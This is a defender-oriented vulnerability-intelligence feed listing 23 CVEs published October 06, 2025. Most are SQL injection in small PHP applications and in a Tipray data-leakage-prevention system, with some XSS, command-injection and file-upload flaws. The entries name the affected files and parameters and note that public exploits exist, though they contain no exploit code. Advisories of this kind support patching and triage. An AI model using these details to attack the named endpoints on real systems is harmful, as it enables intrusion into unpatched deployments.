THREAT ALERT

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Get CVEs that hit your stack — not 200/day

Pick your technologies, get a weekly digest by email. Free, no spam.

React Python Postgres +200 more

React Next.js Python Postgres AWS +200 more

Trending Now See all

Critical Watch See all

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Incoming 20

Pre-NVD – not yet scored

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — October 06, 2025

23 CVEs tracked today. 0 Critical, 0 High, 13 Medium, 10 Low.

CVE-2025-11343 MEDIUM CVSS 5.5
A security vulnerability has been detected in code-projects Student Crud Operation 3.3. Affected is an unknown function of the file delete.php. The manipulation of the argument ID leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and m...

PHP SQLi Crud Operation System
CVE-2025-11341 MEDIUM CVSS 5.5
A security flaw has been discovered in Jinher OA up to 2.0. This affects an unknown function of the file /c6/Jhsoft.Web.module/eformaspx/WebDesign.aspx/?type=SystemUserInfo&style=1. Performing manipulation results in xml external entity reference. Remote exploitation of the attack is possible. The e...

XXE Jinher Oa
CVE-2025-11334 MEDIUM CVSS 5.5
A security flaw has been discovered in Campcodes Online Apartment Visitor Management System 1.0. Affected is an unknown function of the file /visitor-detail.php. The manipulation of the argument editid results in sql injection. The attack can be executed remotely. The exploit has been released to th...

PHP SQLi Online Apartment Visitor Management System
CVE-2025-11329 MEDIUM CVSS 5.5
A flaw has been found in code-projects Online Course Registration 1.0. Impacted is an unknown function of the file /admin/manage-students.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used.

PHP SQLi Online Course Registration Site
CVE-2025-11318 MEDIUM CVSS 5.5
A security flaw has been discovered in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. This vulnerability affects unknown code of the file uploadWxFile.do. The manipulation of the argument File results in unrestricted upload. The attack may be performed from remote. The exploit ha...

Authentication Bypass File Upload Data Leakage Prevention System
CVE-2025-11317 MEDIUM CVSS 5.5
A vulnerability was identified in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. This affects the function findRolePage of the file findSingConfigPage.do. The manipulation of the argument sort leads to sql injection. The attack is possible to be carried out remotely. The exploit ...

SQLi Data Leakage Prevention System
CVE-2025-11316 MEDIUM CVSS 5.5
A vulnerability was determined in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected by this issue is the function findCategoryPage of the file findCategoryPage.do. Executing manipulation of the argument tenantId can lead to sql injection. The attack can be executed remotely...

SQLi Data Leakage Prevention System
CVE-2025-11315 MEDIUM CVSS 5.5
A vulnerability was found in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected by this vulnerability is the function findUserPage of the file findUserPage.do. Performing manipulation of the argument sort results in sql injection. Remote exploitation of the attack is possibl...

SQLi Data Leakage Prevention System
CVE-2025-11314 MEDIUM CVSS 5.5
A vulnerability has been found in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected is the function findRolePage of the file findSingConfigPage.do. Such manipulation of the argument sort leads to sql injection. The attack may be launched remotely. The exploit has been discl...

SQLi Data Leakage Prevention System
CVE-2025-11313 MEDIUM CVSS 5.5
A flaw has been found in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. This impacts the function findRolePage of the file findRolePage.do. This manipulation of the argument sort causes sql injection. The attack may be initiated remotely. The exploit has been published and may be...

SQLi Data Leakage Prevention System
CVE-2025-11312 MEDIUM CVSS 5.5
A vulnerability was detected in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. This affects the function findModulePage of the file findModulePage.do. The manipulation of the argument sort results in sql injection. The attack can be launched remotely. The exploit is now public an...

SQLi Data Leakage Prevention System
CVE-2025-11311 MEDIUM CVSS 5.5
A security vulnerability has been detected in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. The impacted element is the function findTenantPage of the file findTenantPage.do. The manipulation of the argument sort leads to sql injection. The attack can be initiated remotely. The ...

SQLi Data Leakage Prevention System
CVE-2025-11310 MEDIUM CVSS 5.5
A weakness has been identified in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. The affected element is the function findFileServerPage of the file findFileServerPage.do. Executing manipulation of the argument sort can lead to sql injection. It is possible to launch the attack r...

SQLi Data Leakage Prevention System
CVE-2025-11342 LOW CVSS 2.0
SQL injection in code-projects Online Course Registration 1.0 allows high-privileged remote attackers to manipulate the coursecode parameter in /admin/edit-course.php, potentially extracting or modifying database contents. CVSS 4.0 reflects limited scope (only confidentiality/integrity impact to database layer with no system scope expansion), but the vulnerability requires administrative authentication (PR:H), significantly constraining real-world risk despite public exploit availability and 0.03% EPSS indicating minimal spontaneous exploitation likelihood.

PHP SQLi Online Course Registration Site
CVE-2025-11335 LOW CVSS 2.0
Command injection in D-Link DI-7100G C1 firmware up to version 20250928 allows remote authenticated attackers to execute arbitrary commands via the iface parameter in the /msp_info.htm?flag=qos endpoint of the jhttpd component. The vulnerability requires high-level administrative privileges and publicly available exploit code exists, but EPSS score of 0.06% indicates exploitation is unlikely in real-world scenarios due to the privilege requirement.

Command Injection D-Link Di 7100g C1 Firmware
CVE-2025-11333 LOW CVSS 1.9
Stored cross-site scripting (XSS) in Langley FCU Online Banking System via the First Name field on the Add Customer Page (/customer_add_action.php) allows high-privileged authenticated users to inject malicious scripts affecting other users. The CVSS score of 1.9 reflects the high privilege requirement (PR:H) and user interaction dependency (UI:P), limiting real-world risk despite public exploit availability. No active exploitation has been confirmed in CISA KEV at time of analysis.

PHP XSS
CVE-2025-11332 LOW CVSS 2.0
Reflected cross-site scripting (XSS) in CmsEasy up to version 7.7.7 allows authenticated remote attackers to inject malicious scripts via manipulation of the PHP_SELF argument in the URL handler component (lib/inc/view.php). The vulnerability requires user interaction (clicking a malicious link) and user login to trigger, resulting in limited integrity impact. Publicly available exploit code exists, though EPSS score remains low at 0.03%, reflecting the significant prerequisites (authentication and user click required) that limit real-world exploitation potential. The vendor has not responded to disclosure attempts.

PHP XSS Cmseasy
CVE-2025-11331 LOW CVSS 2.0
Command injection in IdeaCMS up to version 1.8 allows high-privileged remote attackers to execute arbitrary system commands via manipulation of the 网站名称 (website name) parameter in the Website Name Handler component. The vulnerability exists in app/common/logic/admin/Config.php and requires high-privilege credentials but has publicly available exploit code and carries notable risk given the vendor's non-responsiveness to early disclosure.

PHP Command Injection Ideacms
CVE-2025-11330 LOW CVSS 2.1
SQL injection in PHPGurukul Beauty Parlour Management System 1.1 allows authenticated remote attackers to execute arbitrary SQL queries via manipulated fromdate and todate parameters in /admin/sales-reports-detail.php. The vulnerability has low real-world impact (CVSS 2.1, EPSS 0.04%) despite public exploit availability, as it requires valid admin authentication and yields only limited data disclosure without full database manipulation capability.

PHP SQLi Beauty Parlour Management System
CVE-2025-11322 LOW CVSS 2.9
Weak password requirements in Mangati NovoSGA up to version 2.2.12 allow remote attackers to bypass password policy validation during user account creation via manipulation of the Senha/Confirmação da senha (password/password confirmation) parameters on the /novosga.users/new endpoint. The vulnerability is difficult to exploit (CVSS AC:H) and offers only low confidentiality impact, but public exploit code is available and enables brute-force attacks against weak user credentials. EPSS score of 0.04% (percentile 12%) indicates limited real-world exploitation likelihood despite CVE publication.

Information Disclosure Brute Force
CVE-2025-11321 LOW CVSS 2.1
Authorization bypass in zhuimengshaonian wisdom-education up to version 1.0.4 allows authenticated remote attackers to manipulate the subjectId parameter in WrongBookController.java to access unauthorized resources. The vulnerability has a low CVSS score (2.1) due to limited confidentiality impact and requirement for prior authentication, but publicly available exploit code exists and the attack vector is entirely network-accessible.

Authentication Bypass Java
CVE-2025-11320 LOW CVSS 2.1
Unrestricted file upload in zhuimengshaonian wisdom-education up to version 1.0.4 allows authenticated remote attackers to upload arbitrary files via the uploadFile function in UploadController.java, potentially enabling remote code execution or system compromise. The vulnerability has publicly disclosed exploit code available. Despite a low CVSS score of 2.1 reflecting limited direct impact scope, the presence of public exploits and authentication bypass tags suggests practical exploitation risk in environments where attacker access is feasible.

Authentication Bypass Java File Upload
CVE-2025-11319 LOW CVSS 2.1
SQL injection in nahiduddinahammed Hospital-Management-System-Website allows authenticated remote attackers to execute arbitrary SQL queries via the ai parameter in /delete.php, with public exploit code available. The CVSS 2.1 score and 0.03% EPSS percentile indicate low real-world risk despite network accessibility, as exploitation requires valid user authentication and produces only limited confidentiality impact. The vendor has not responded to disclosure attempts.

PHP SQLi

Track CVEs for your stack Sign up free →

Today's Vulnerabilities Vulnerabilities